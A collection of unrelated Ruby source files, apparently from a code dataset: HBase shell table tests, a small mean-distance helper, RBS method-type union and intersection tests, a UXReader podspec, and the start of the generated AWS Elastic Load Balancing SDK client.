assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_nil(res['1']['x:b'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_nil(res['2']['x:b'])
end
define_test "scan should work with raw and version parameter" do
# Create test table if it does not exist
@test_name_raw = "hbase_shell_tests_raw_scan"
create_test_table(@test_name_raw)
@test_table = table(@test_name_raw)
# Insert test data
@test_table.put(1, "x:a", 1)
@test_table.put(2, "x:raw1", 11)
@test_table.put(2, "x:raw1", 11)
@test_table.put(2, "x:raw1", 11)
@test_table.put(2, "x:raw1", 11)
args = {}
num_rows = 0
@test_table._scan_internal(args) do # Normal Scan
num_rows += 1
end
assert_equal(num_rows, 2,
             'Num rows scanned without RAW/VERSIONS is not 2')
# Since 4 versions of the cell in row 2 have been added, any VERSIONS value >= 4 scans all of them.
args = { VERSIONS => 10, RAW => true }
num_rows = 0
@test_table._scan_internal(args) do # Raw Scan
num_rows += 1
end
# 5 expected: 1 from row key '1' and 4 (all versions) from row key '2'
assert_equal(num_rows, 5,
             'Num rows scanned with RAW/VERSIONS is not 5')
@test_table.delete(1, 'x:a')
args = {}
num_rows = 0
@test_table._scan_internal(args) do # Normal Scan
num_rows += 1
end
assert_equal(num_rows, 1,
             'Num rows scanned without RAW/VERSIONS is not 1')
args = { VERSIONS => 10, RAW => true }
num_rows = 0
@test_table._scan_internal(args) do # Raw Scan
num_rows += 1
end
# 6 expected: 2 from row key '1' (the put plus its delete marker) and 4 (all versions) from row key '2'
assert_equal(num_rows, 6,
             'Num rows scanned with RAW/VERSIONS is not 6')
end
define_test "scan should fail on invalid COLUMNS parameter types" do
assert_raise(ArgumentError) do
@test_table._scan_internal COLUMNS => {}
end
end
define_test "scan should fail on non-hash params" do
assert_raise(ArgumentError) do
@test_table._scan_internal 123
end
end
define_test "scan with a block should yield rows and return rows counter" do
rows = {}
res = @test_table._scan_internal { |row, cells| rows[row] = cells }
assert_equal([rows.keys.size, false], res)
end
define_test "scan should support COLUMNS with value CONVERTER information" do
@test_table.put(1, "x:c", [1024].pack('N'))
@test_table.put(1, "x:d", [98].pack('N'))
begin
res = @test_table._scan_internal COLUMNS => ['x:c:toInt', 'x:d:c(org.apache.hadoop.hbase.util.Bytes).toInt']
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(/value=1024/.match(res['1']['x:c']))
assert_not_nil(/value=98/.match(res['1']['x:d']))
ensure
# clean up newly added columns for this test only.
@test_table.deleteall(1, 'x:c')
@test_table.deleteall(1, 'x:d')
end
end
define_test "scan should support FILTER" do
@test_table.put(1, "x:v", "thisvalue")
begin
res = @test_table._scan_internal FILTER => "ValueFilter(=, 'binary:thisvalue')"
assert_not_equal(res, {}, "Result is empty")
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:v'])
assert_nil(res['1']['x:a'])
assert_nil(res['2'])
res = @test_table._scan_internal FILTER => "ValueFilter(=, 'binary:thatvalue')"
assert_equal(res, {}, "Result is not empty")
ensure
# clean up newly added columns for this test only.
@test_table.deleteall(1, 'x:v')
end
end
define_test "scan should support FILTER with non-ASCII bytes" do
@test_table.put(4, "x:a", "\x82")
begin
res = @test_table._scan_internal FILTER => "SingleColumnValueFilter('x', 'a', >=, 'binary:\x82', true, true)"
assert_not_equal(res, {}, "Result is empty")
assert_kind_of(Hash, res)
assert_not_nil(res['4'])
assert_not_nil(res['4']['x:a'])
assert_nil(res['1'])
assert_nil(res['2'])
ensure
# clean up newly added columns for this test only.
@test_table.deleteall(4, 'x:a')
end
end
define_test "scan hbase meta table" do
res = table("hbase:meta")._scan_internal
assert_not_nil(res)
end
define_test "mutation with TTL should expire" do
@test_table.put('ttlTest', 'x:a', 'foo', { TTL => 1000 } )
begin
res = @test_table._get_internal('ttlTest', 'x:a')
assert_not_nil(res)
sleep 2
res = @test_table._get_internal('ttlTest', 'x:a')
assert_nil(res)
ensure
@test_table.deleteall('ttlTest', 'x:a')
end
end
define_test "Split count for a table" do
@testTableName = "tableWithSplits"
create_test_table_with_splits(@testTableName, SPLITS => ['10', '20', '30', '40'])
@table = table(@testTableName)
splits = @table._get_splits_internal()
# Total splits is 5, but the count here is 4 because the implicit empty split is ignored.
assert_equal(4, splits.size)
assert_equal(["10", "20", "30", "40"], splits)
drop_test_table(@testTableName)
end
define_test "Split count for a empty table" do
splits = @test_table._get_splits_internal()
#Empty split should not be part of this array.
assert_equal(0, splits.size)
assert_equal([], splits)
end
define_test 'Split count for a table with region replicas' do
@test_table_name = 'tableWithRegionReplicas'
create_test_table_with_region_replicas(@test_table_name, 3,
SPLITS => ['10'])
@table = table(@test_table_name)
splits = @table._get_splits_internal
# In this case, total splits should be 1 even if the number of region
# replicas is 3.
assert_equal(1, splits.size)
assert_equal(['10'], splits)
drop_test_table(@test_table_name)
end
define_test "scan should throw an exception on a disabled table" do
@test_table.disable
begin
assert_raise(RuntimeError) do
@test_table.scan
end
ensure
@test_table.enable
end
end
end
# rubocop:enable Metrics/ClassLength
end
| 32.954608 | 163 | 0.613532 |
111ddfc23601f8ab5e709292b955050b5e1eac3b | 719 | require 'pp'
module MeanTest
def self.mean_distances(ps_block)
#ps_block = {
# keys: ["beta", "H"],
# ps: [
# {v: [0.2, -1.0], result: [-0.483285, -0.484342, -0.483428]},
# ...
# ],
# }
mean_distance = []
ps_block[:keys].each_with_index do |key, index|
mean = {}
ps_block[:ps].each do |ps|
mean[ps[:v][index]] ||= []
mean[ps[:v][index]] += ps[:result]
end
means = []
mean.each_pair do |v_val, results|
means << results.inject(:+) / results.size
end
mean_distance << (means.max - means.min)
end
mean_distance
end
end
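
# A minimal usage sketch (the values below are illustrative, not taken from a
# real run): for each key, mean_distances groups results by that key's value,
# averages each group, and reports max(mean) - min(mean).
if __FILE__ == $PROGRAM_NAME
  sample_block = {
    keys: ["beta", "H"],
    ps: [
      { v: [0.2, -1.0], result: [-0.48, -0.49] },
      { v: [0.4, -1.0], result: [-0.52, -0.51] }
    ]
  }
  pp MeanTest.mean_distances(sample_block)
  # => roughly [0.03, 0.0] ("beta" takes two distinct values, "H" only one)
end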
| 23.193548 | 84 | 0.452017 |
3829ba6c8353a94d5f415a6489fd1b7e383b1014 | 21,687 | require_relative "test_helper"
class InterfaceTest < Minitest::Test
include TestHelper
include FactoryHelper
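# Helper: parse a method type string and return only its parameter part, so
# the tests below can apply +, | and & to parameter lists directly.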
def method_params(source)
parse_method_type(source).type.params
end
def test_method_type_params_plus
with_factory do
assert_equal method_params("(String | Integer) -> untyped"),
method_params("(String) -> untyped") + method_params("(Integer) -> untyped")
assert_equal method_params("(?String | Integer | nil) -> untyped"),
method_params("(String) -> untyped") + method_params("(?Integer) -> untyped")
assert_equal method_params("(?String | Integer | nil, *Integer) -> untyped"),
method_params("(String) -> untyped") + method_params("(*Integer) -> untyped")
assert_equal method_params("(?String | nil) -> untyped"),
method_params("(String) -> untyped") + method_params("() -> untyped")
assert_equal method_params("(?String | Integer | nil) -> untyped"),
method_params("(?String) -> untyped") + method_params("(Integer) -> untyped")
assert_equal method_params("(?String | Integer) -> untyped"),
method_params("(?String) -> untyped") + method_params("(?Integer) -> untyped")
assert_equal method_params("(?String | Integer, *Integer) -> untyped"),
method_params("(?String) -> untyped") + method_params("(*Integer) -> untyped")
assert_equal method_params("(?String) -> untyped"),
method_params("(?String) -> untyped") + method_params("() -> untyped")
assert_equal method_params("(?String | Integer | nil, *String) -> untyped"),
method_params("(*String) -> untyped") + method_params("(Integer) -> untyped")
assert_equal method_params("(?String | Integer, *String) -> untyped"),
method_params("(*String) -> untyped") + method_params("(?Integer) -> untyped")
assert_equal method_params("(*String | Integer) -> untyped"),
method_params("(*String) -> untyped") + method_params("(*Integer) -> untyped")
assert_equal method_params("(*String) -> untyped"),
method_params("(*String) -> untyped") + method_params("() -> untyped")
assert_equal method_params("(?Integer?) -> untyped"),
method_params("() -> untyped") + method_params("(Integer) -> untyped")
assert_equal method_params("(?Integer) -> untyped"),
method_params("() -> untyped") + method_params("(?Integer) -> untyped")
assert_equal method_params("(*Integer) -> untyped"),
method_params("() -> untyped") + method_params("(*Integer) -> untyped")
assert_equal method_params("() -> untyped"),
method_params("() -> untyped") + method_params("() -> untyped")
assert_equal method_params("(foo: String | Integer) -> void"),
method_params("(foo: String) -> void") + method_params("(foo: Integer) -> untyped")
assert_equal method_params("(?foo: String | Integer | nil) -> void"),
method_params("(foo: String) -> void") + method_params("(?foo: Integer) -> untyped")
assert_equal method_params("(?foo: String | Integer | nil, **Integer) -> void"),
method_params("(foo: String) -> void") + method_params("(**Integer) -> untyped")
assert_equal method_params("(?foo: String?) -> void"),
method_params("(foo: String) -> void") + method_params("() -> untyped")
assert_equal method_params("(?foo: String | Integer | nil) -> void"),
method_params("(?foo: String) -> void") + method_params("(foo: Integer) -> untyped")
assert_equal method_params("(?foo: String | Integer) -> void"),
method_params("(?foo: String) -> void") + method_params("(?foo: Integer) -> untyped")
assert_equal method_params("(?foo: String | Integer, **Integer) -> void"),
method_params("(?foo: String) -> void") + method_params("(**Integer) -> untyped")
assert_equal method_params("(?foo: String) -> void"),
method_params("(?foo: String) -> void") + method_params("() -> untyped")
assert_equal method_params("(?foo: Integer | String | nil, **String) -> void"),
method_params("(**String) -> void") + method_params("(foo: Integer) -> untyped")
assert_equal method_params("(?foo: Integer | String, **String) -> void"),
method_params("(**String) -> void") + method_params("(?foo: Integer) -> untyped")
assert_equal method_params("(**String | Integer) -> void"),
method_params("(**String) -> void") + method_params("(**Integer) -> untyped")
assert_equal method_params("(**String) -> void"),
method_params("(**String) -> void") + method_params("() -> untyped")
assert_equal method_params("(?foo: Integer?) -> void"),
method_params("() -> void") + method_params("(foo: Integer) -> untyped")
assert_equal method_params("(?foo: Integer) -> void"),
method_params("() -> void") + method_params("(?foo: Integer) -> untyped")
assert_equal method_params("(**Integer) -> void"),
method_params("() -> void") + method_params("(**Integer) -> untyped")
assert_equal method_params("() -> void"),
method_params("() -> void") + method_params("() -> untyped")
end
end
def test_method_type_params_intersection
with_factory do
# req, none, opt, rest
# required:required
assert_equal method_params("(String & Integer) -> untyped"),
method_params("(String) -> untyped") & method_params("(Integer) -> untyped")
# required:none
assert_nil method_params("(String) -> untyped") & method_params("() -> untyped")
# required:optional
assert_equal method_params("(String & Integer) -> untyped"),
method_params("(String) -> untyped") & method_params("(?Integer) -> untyped")
# required:rest
assert_equal method_params("(String & Integer) -> untyped"),
method_params("(String) -> untyped") & method_params("(*Integer) -> untyped")
# none:required
assert_nil method_params("() -> untyped") & method_params("(String) -> void")
# none:optional
assert_equal method_params("() -> untyped"),
method_params("() -> untyped") & method_params("(?Integer) -> untyped")
# none:rest
assert_equal method_params("() -> untyped"),
method_params("() -> untyped") & method_params("(*Integer) -> untyped")
# opt:required
assert_equal method_params("(String & Integer) -> untyped"),
method_params("(?String) -> untyped") & method_params("(Integer) -> untyped")
# opt:none
assert_equal method_params("() -> untyped"),
method_params("(?String) -> untyped") & method_params("() -> untyped")
# opt:opt
assert_equal method_params("(?String & Integer) -> untyped"),
method_params("(?String) -> untyped") & method_params("(?Integer) -> untyped")
# opt:rest
assert_equal method_params("(?String & Integer) -> untyped"),
method_params("(?String) -> untyped") & method_params("(*Integer) -> untyped")
# rest:required
assert_equal method_params("(String & Integer) -> untyped"),
method_params("(*String) -> untyped") & method_params("(Integer) -> untyped")
# rest:none
assert_equal method_params("() -> untyped"),
method_params("(*String) -> untyped") & method_params("() -> untyped")
# rest:opt
assert_equal method_params("(?String & Integer) -> untyped"),
method_params("(*String) -> untyped") & method_params("(?Integer) -> untyped")
# rest:rest
assert_equal method_params("(*String & Integer) -> untyped"),
method_params("(*String) -> untyped") & method_params("(*Integer) -> untyped")
## Keywords
# req:req
assert_equal method_params("(foo: String & Integer) -> untyped"),
method_params("(foo: String) -> untyped") & method_params("(foo: Integer) -> untyped")
# req:opt
assert_equal method_params("(foo: String & Integer) -> untyped"),
method_params("(foo: String) -> untyped") & method_params("(?foo: Integer) -> untyped")
# req:none
assert_nil method_params("(foo: String) -> untyped") & method_params("() -> untyped")
# req:rest
assert_equal method_params("(foo: String & Integer) -> untyped"),
method_params("(foo: String) -> untyped") & method_params("(**Integer) -> untyped")
# opt:req
assert_equal method_params("(foo: String & Integer) -> untyped"),
method_params("(?foo: String) -> untyped") & method_params("(foo: Integer) -> untyped")
# opt:opt
assert_equal method_params("(?foo: String & Integer) -> untyped"),
method_params("(?foo: String) -> untyped") & method_params("(?foo: Integer) -> untyped")
# opt:none
assert_equal method_params("() -> untyped"),
method_params("(?foo: String) -> untyped") & method_params("() -> untyped")
# opt:rest
assert_equal method_params("(?foo: String & Integer) -> untyped"),
method_params("(?foo: String) -> untyped") & method_params("(**Integer) -> untyped")
# none:req
assert_nil method_params("() -> untyped") & method_params("(foo: String) -> untyped")
# none:opt
assert_equal method_params("() -> untyped"),
method_params("() -> untyped") & method_params("(?foo: Integer) -> untyped")
# none:rest
assert_equal method_params("() -> untyped"),
method_params("() -> untyped") & method_params("(**Integer) -> untyped")
# rest:req
assert_equal method_params("(foo: String & Integer) -> untyped"),
method_params("(**String) -> untyped") & method_params("(foo: Integer) -> untyped")
# rest:opt
assert_equal method_params("(?foo: String & Integer) -> untyped"),
method_params("(**String) -> untyped") & method_params("(?foo: Integer) -> untyped")
# rest:none
assert_equal method_params("() -> untyped"),
method_params("(**String) -> untyped") & method_params("() -> untyped")
# rest:rest
assert_equal method_params("(**String & Integer) -> untyped"),
method_params("(**String) -> untyped") & method_params("(**Integer) -> untyped")
end
end
def test_method_type_params_union
with_factory do
# required:required
assert_equal method_params("(String | Integer) -> untyped"),
method_params("(String) -> untyped") | method_params("(Integer) -> untyped")
# required:none
assert_equal method_params("(?String) -> void"),
method_params("(String) -> untyped") | method_params("() -> untyped")
# required:optional
assert_equal method_params("(?String | Integer) -> untyped"),
method_params("(String) -> untyped") | method_params("(?Integer) -> untyped")
# required:rest
assert_equal method_params("(?String | Integer, *Integer) -> untyped"),
method_params("(String) -> untyped") | method_params("(*Integer) -> untyped")
# none:required
assert_equal method_params("(?String) -> untyped"),
method_params("() -> untyped") | method_params("(String) -> untyped")
# none:optional
assert_equal method_params("(?Integer) -> untyped"),
method_params("() -> untyped") | method_params("(?Integer) -> untyped")
# none:rest
assert_equal method_params("(*Integer) -> untyped"),
method_params("() -> untyped") | method_params("(*Integer) -> untyped")
# opt:required
assert_equal method_params("(?String | Integer) -> untyped"),
method_params("(?String) -> untyped") | method_params("(Integer) -> untyped")
# opt:none
assert_equal method_params("(?String) -> untyped"),
method_params("(?String) -> untyped") | method_params("() -> untyped")
# opt:opt
assert_equal method_params("(?String | Integer) -> untyped"),
method_params("(?String) -> untyped") | method_params("(?Integer) -> untyped")
# opt:rest
assert_equal method_params("(?String | Integer) -> untyped"),
method_params("(?String) -> untyped") | method_params("(*Integer) -> untyped")
# rest:required
assert_equal method_params("(?String | Integer, *String) -> untyped"),
method_params("(*String) -> untyped") | method_params("(Integer) -> untyped")
# rest:none
assert_equal method_params("(*String) -> untyped"),
method_params("(*String) -> untyped") | method_params("() -> untyped")
# rest:opt
assert_equal method_params("(?String | Integer, *String) -> untyped"),
method_params("(*String) -> untyped") | method_params("(?Integer) -> untyped")
# rest:rest
assert_equal method_params("(*String | Integer) -> untyped"),
method_params("(*String) -> untyped") | method_params("(*Integer) -> untyped")
## Keywords
# req:req
assert_equal method_params("(foo: String | Integer) -> untyped"),
method_params("(foo: String) -> untyped") | method_params("(foo: Integer) -> untyped")
# req:opt
assert_equal method_params("(?foo: String | Integer) -> untyped"),
method_params("(foo: String) -> untyped") | method_params("(?foo: Integer) -> untyped")
# req:none
assert_equal method_params("(?foo: String) -> untyped"),
method_params("(foo: String) -> untyped") | method_params("() -> untyped")
# req:rest
assert_equal method_params("(?foo: String | Integer, **Integer) -> untyped"),
method_params("(foo: String) -> untyped") | method_params("(**Integer) -> untyped")
# opt:req
assert_equal method_params("(?foo: String | Integer) -> untyped"),
method_params("(?foo: String) -> untyped") | method_params("(foo: Integer) -> untyped")
# opt:opt
assert_equal method_params("(?foo: String | Integer) -> untyped"),
method_params("(?foo: String) -> untyped") | method_params("(?foo: Integer) -> untyped")
# opt:none
assert_equal method_params("(?foo: String) -> untyped"),
method_params("(?foo: String) -> untyped") | method_params("() -> untyped")
# opt:rest
assert_equal method_params("(?foo: String | Integer, **Integer) -> untyped"),
method_params("(?foo: String) -> untyped") | method_params("(**Integer) -> untyped")
# none:req
assert_equal method_params("(?foo: String) -> untyped"),
method_params("() -> untyped") | method_params("(foo: String) -> untyped")
# none:opt
assert_equal method_params("(?foo: Integer) -> untyped"),
method_params("() -> untyped") | method_params("(?foo: Integer) -> untyped")
# none:rest
assert_equal method_params("(**Integer) -> untyped"),
method_params("() -> untyped") | method_params("(**Integer) -> untyped")
# rest:req
assert_equal method_params("(?foo: String | Integer, **String) -> untyped"),
method_params("(**String) -> untyped") | method_params("(foo: Integer) -> untyped")
# rest:opt
assert_equal method_params("(?foo: String | Integer, **String) -> untyped"),
method_params("(**String) -> untyped") | method_params("(?foo: Integer) -> untyped")
# rest:none
assert_equal method_params("(**String) -> untyped"),
method_params("(**String) -> untyped") | method_params("() -> untyped")
# rest:rest
assert_equal method_params("(**String | Integer) -> untyped"),
method_params("(**String) -> untyped") | method_params("(**Integer) -> untyped")
end
end
def test_method_type_union
with_factory do
assert_equal parse_method_type("(String & Integer) -> (String | Symbol)"),
parse_method_type("(String) -> String") | parse_method_type("(Integer) -> Symbol")
assert_nil parse_method_type("() -> String") | parse_method_type("(Integer) -> untyped")
assert_equal parse_method_type("() -> bool"),
parse_method_type("() -> bot") | parse_method_type("() -> bool")
assert_equal parse_method_type("() -> untyped"),
parse_method_type("() -> untyped") | parse_method_type("() -> String")
assert_equal parse_method_type("() { (String | Integer) -> (Integer & Float) } -> (String | Symbol)"),
parse_method_type("() { (String) -> Integer } -> String") | parse_method_type("() { (Integer) -> Float } -> Symbol")
assert_equal parse_method_type("() { (String | Integer, ?String) -> void } -> void"),
parse_method_type("() { (String, String) -> void } -> void") | parse_method_type("() { (Integer) -> void } -> void")
assert_equal parse_method_type("() { (String | Integer) -> (Integer & Float) } -> (String | Symbol)"),
parse_method_type("() ?{ (String) -> Integer } -> String") | parse_method_type("() { (Integer) -> Float } -> Symbol")
assert_equal parse_method_type("() ?{ (String) -> Integer } -> (String | Symbol)"),
parse_method_type("() ?{ (String) -> Integer } -> String") | parse_method_type("() -> Symbol")
end
end
def test_method_type_union_poly
with_factory do
assert_method_type(
"[A, A(n), B(m)] ((Array[A] & Hash[A(n), B(m)])) -> (String | Symbol)",
parse_method_type("[A] (Array[A]) -> String") | parse_method_type("[A, B] (Hash[A, B]) -> Symbol")
)
end
end
def test_method_type_intersection
with_factory do
assert_equal parse_method_type("(String | Integer) -> (String & Symbol)"),
parse_method_type("(String) -> String") & parse_method_type("(Integer) -> Symbol")
assert_equal parse_method_type("(?Integer) -> untyped"),
parse_method_type("() -> String") & parse_method_type("(Integer) -> untyped")
assert_equal parse_method_type("() -> bot"),
parse_method_type("() -> bot") & parse_method_type("() -> bool")
assert_equal parse_method_type("() -> untyped"),
parse_method_type("() -> untyped") & parse_method_type("() -> String")
assert_equal parse_method_type("() { (String & Integer) -> (Integer | Float) } -> (String & Symbol)"),
parse_method_type("() { (String) -> Integer } -> String") & parse_method_type("() { (Integer) -> Float } -> Symbol")
assert_nil parse_method_type("() { (String, String) -> void } -> void") & parse_method_type("() { (Integer) -> void } -> void")
assert_equal parse_method_type("() ?{ (String & Integer) -> (Integer | Float) } -> (String & Symbol)"),
parse_method_type("() ?{ (String) -> Integer } -> String") & parse_method_type("() { (Integer) -> Float } -> Symbol")
end
end
def test_method_type_intersection_poly
with_factory do
assert_method_type(
"[A, A(i) < Array[Integer]] ((A | A(i))) -> (A & Integer)",
parse_method_type("[A] (A) -> A") & parse_method_type("[A < Array[Integer]] (A) -> Integer")
)
end
end
def test_method_type_plus
with_factory do |factory|
assert_equal parse_method_type("(String | Integer) -> untyped"),
parse_method_type("(String) -> untyped") + parse_method_type("(Integer) -> untyped")
assert_equal parse_method_type("(?String | Integer | nil) -> untyped"),
parse_method_type("(?String) -> untyped") + parse_method_type("(Integer) -> untyped")
assert_equal parse_method_type("(?String | nil) -> untyped"),
parse_method_type("(String) -> untyped") + parse_method_type("() -> untyped")
assert_equal parse_method_type("(?String | Symbol | nil, *Symbol) -> untyped"),
parse_method_type("(String) -> untyped") + parse_method_type("(*Symbol) -> untyped")
assert_equal parse_method_type("(?String | Symbol | nil, *Symbol) -> (Array | Hash)"),
parse_method_type("(String) -> Hash") + parse_method_type("(*Symbol) -> Array")
assert_equal parse_method_type("(name: String | Symbol, ?email: String | Array | nil, ?age: Integer | Object | nil, **Array | Object) -> void"),
parse_method_type("(name: String, email: String, **Object) -> void") + parse_method_type("(name: Symbol, age: Integer, **Array) -> void")
assert_equal parse_method_type("() ?{ (String | Integer) -> (Array | Hash) } -> void"),
parse_method_type("() ?{ (String) -> Array } -> void") + parse_method_type("() { (Integer) -> Hash } -> void")
end
end
def test_method_type_params_poly
with_factory do |factory|
assert_method_type(
"[A(n)] () ?{ (String) -> A(n) } -> (String | A(n))",
parse_method_type("() -> String") + parse_method_type("[A] { (String) -> A } -> A")
)
end
end
end
| 46.941558 | 156 | 0.575829 |
f8e9797c3dd33325eb190b7684bbbd5f7ae97346 | 540 | Pod::Spec.new do |s|
s.name = 'UXReader'
s.version = '0.1.1'
s.platform = :ios, '8.0'
s.summary = 'UXReader PDF Framework for iOS'
s.homepage = 'https://github.com/muyexi/UXReader-iOS'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'muyexi' => '[email protected]' }
s.source = { :git => 'https://github.com/muyexi/UXReader-iOS.git', :tag => s.version.to_s }
s.vendored_frameworks = 'UXReader.framework'
s.requires_arc = true
end
| 41.538462 | 103 | 0.544444 |
f885863fb523d9b5c7e70b6c50429063894f2761 | 105,291 | # WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/query.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:elasticloadbalancing)
module Aws::ElasticLoadBalancing
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :elasticloadbalancing
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::Query)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::SharedCredentials` - Used for loading credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2 IMDS instance profile - When used by default, the timeouts are
# very aggressive. Construct and pass an instance of
#     `Aws::InstanceProfileCredentials` to enable retries and extended
# timeouts.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is search for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
#   to test endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
#   Use this option to configure the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available. Defaults to `false`.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function. Some predefined functions can be referenced by name - :none, :equal, :full, otherwise a Proc that takes and returns a number.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors and auth
# errors from expired credentials.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit) used by the default backoff function.
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
#   seconds to wait when opening an HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Integer] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set
#   per-request on the session yielded by {#session_for}.
#
# @option options [Float] :http_idle_timeout (5) The number of
#   seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
